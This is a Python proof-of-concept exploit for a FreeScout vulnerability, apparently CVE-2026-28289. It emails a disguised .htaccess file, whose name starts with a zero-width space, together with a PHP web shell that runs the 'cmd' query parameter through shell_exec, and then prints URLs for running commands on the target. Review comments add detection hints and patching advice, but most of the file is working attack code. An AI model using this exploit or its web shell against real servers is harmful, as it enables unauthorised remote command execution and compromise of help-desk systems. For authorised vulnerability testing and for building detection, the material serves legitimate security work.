POC / Mail2Shell.py PY
#!/usr/bin/env python3
import getpass
import smtplib
import sys
from datetime import datetime
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart

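# Banner: names the upstream repository and the CVE this PoC exercises.
print("=== https://github.com/0xAshwesker/CVE-2026-28289  ===")
print("=== CVE-2026-28289 Mail2Shell PoC (Zero-Click RCE) ===")
print("Legal testing ONLY on your own server\n")

# The base URL of the FreeScout instance is the only command-line argument.
# Root is not required: the script writes two small files to the current
# directory and opens an outbound SMTP connection, so the usage line does not
# suggest sudo and names the script as it was actually invoked.
if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} http://target")
    sys.exit(1)

# The trailing slash is dropped so the URLs printed at the end do not contain
# "//". The script itself never connects to this URL; it is only used to format
# the verification links shown to the operator.
target = sys.argv[1].rstrip('/')
print(f"Target: {target}\n")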

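# Interactive prompts: the relay account used to deliver the test message and
# the addresses to put on it. Nothing is read from the command line so that the
# credentials do not end up in shell history or the process list.
smtp_server = input("SMTP Server (e.g. smtp.gmail.com): ")
try:
    smtp_port = int(input("SMTP Port (usually 587): "))
except ValueError:
    # A non-numeric or empty answer would otherwise end in a bare traceback.
    print("❌ SMTP port must be a number")
    sys.exit(1)
smtp_user = input("SMTP Username (your email): ")
# getpass keeps the password off the screen and out of terminal scrollback.
smtp_pass = getpass.getpass("SMTP Password/App Password: ")
from_email = input("From Email: ")
to_email = input("To Email (ANY mailbox configured in FreeScout): ")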

# Build the two attachments as files in the current working directory.
# NOTE(review): both files land wherever the script is started, so run it from
# a scratch directory that no web server serves.
#
# File 1: a name made of U+200B (ZERO WIDTH SPACE) followed by ".htaccess".
# The first character of the name is therefore not ".", although the name is
# displayed as ".htaccess". The original comment calls this the "official
# bypass method"; the server-side filename check it gets past is not shown on
# this page.
# Detection: flag inbound attachments whose decoded filename contains U+200B or
# other invisible/format code points, and alert on any .htaccess file that
# appears under the application's attachment storage directory.
zwsp = '\u200b'
htaccess_name = zwsp + '.htaccess'
with open(htaccess_name, 'w', encoding='utf-8') as f:
    # Asks Apache to hand .txt files in the same directory to the PHP handler.
    # The directive only takes effect where per-directory overrides are
    # honoured; AllowOverride None disables it.
    f.write('AddHandler application/x-httpd-php .txt\n')

# File 2: a .txt file holding PHP that passes the "cmd" query parameter to
# shell_exec() and echoes the output. On its own a .txt file is served as text;
# it only executes if the handler mapping above is in force.
# Detection: web access logs showing a "cmd=" query string on requests for
# files under /storage/attachment.
webshell_name = 'webshell.txt'
with open(webshell_name, 'w', encoding='utf-8') as f:
    f.write('<?php if(isset($_GET["cmd"])) { echo "<pre>".shell_exec($_GET["cmd"])."</pre>"; } ?>')

print("✅ Malicious files created (.htaccess + webshell.txt)")

# Assemble the multipart message that carries both files. The PoC describes the
# trigger as zero-click: per the "To Email" prompt, the message only has to be
# addressed to a mailbox that FreeScout is configured with. This block only
# builds the message; nothing is sent yet.
msg = MIMEMultipart()
msg['From'] = from_email
msg['To'] = to_email
# The subject embeds the current local time.
msg['Subject'] = f"Mail2Shell Test {datetime.now()}"

# Attach each file as base64-encoded application/octet-stream.
for filename in [htaccess_name, webshell_name]:
    with open(filename, 'rb') as f:
        part = MIMEBase('application', 'octet-stream')
        part.set_payload(f.read())
        encoders.encode_base64(part)
        # The local file name, including the leading U+200B of the first file,
        # is interpolated verbatim into the Content-Disposition header. A mail
        # gateway rule therefore has to inspect the decoded filename, not just
        # how it renders.
        part.add_header('Content-Disposition', f'attachment; filename="{filename}"')
        msg.attach(part)

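import os

# Hand the message to the operator-supplied SMTP relay, then remove the two
# local files no matter how the attempt ends.
try:
    # The timeout makes an unreachable relay fail instead of hanging forever;
    # the context manager closes the connection on both success and failure.
    with smtplib.SMTP(smtp_server, smtp_port, timeout=30) as server:
        # NOTE(review): starttls() without an ssl context does not verify the
        # relay's certificate, so the login below can be exposed to an on-path
        # attacker. Pass context=ssl.create_default_context() when the relay
        # presents a certificate that validates.
        server.starttls()
        server.login(smtp_user, smtp_pass)
        server.send_message(msg)
    # All the script knows at this point is that the relay accepted the
    # message; whether the target fetched or processed it is not observable
    # from here, so the message does not claim code execution.
    print("✅ Email accepted by the SMTP server (processing by the target is not confirmed)")
except Exception as e:
    print(f"❌ SMTP Error: {e}")
    sys.exit(1)
finally:
    # Cleanup local files. This runs on the failure path too (sys.exit raises
    # SystemExit, which still passes through finally), so a PHP web shell and
    # an .htaccess look-alike are never left behind in the working directory.
    for leftover in (htaccess_name, webshell_name):
        try:
            os.remove(leftover)
        except FileNotFoundError:
            pass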

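# Manual verification steps for the operator. The script cannot tell whether
# the attachments were stored or whether the handler mapping took effect, so
# the outcome is worded conditionally rather than announced as a success.
print("\n" + "="*60)
print("NEXT STEP (you have server access):")
print("SSH to your FreeScout server and run this command:")
print("find /var/www/html/storage/attachment -name webshell.txt -type f 2>/dev/null")
print("(change /var/www/html if your install path is different)")
print("\nWhen you find the path (example: /storage/attachment/2026/03/05/15/webshell.txt)")
print("Open in browser:")
print(f"{target}/storage/attachment/[FULL-PATH-FROM-FIND]/webshell.txt?cmd=whoami")
print(f"{target}/storage/attachment/[FULL-PATH-FROM-FIND]/webshell.txt?cmd=id")
print("="*60)

# Result interpretation and remediation. The uploaded test files are a live
# web shell for anyone who can reach the URL, so removing them comes first.
print("\nIf the browser shows command output, the server is vulnerable. "
      "If find returns nothing or the file is served as plain text, this run did not demonstrate code execution.")
print("Test done? Delete the uploaded test files (webshell.txt and the accompanying .htaccess) "
      "from the attachment directory, then patch immediately to 1.8.207 + set AllowOverride None")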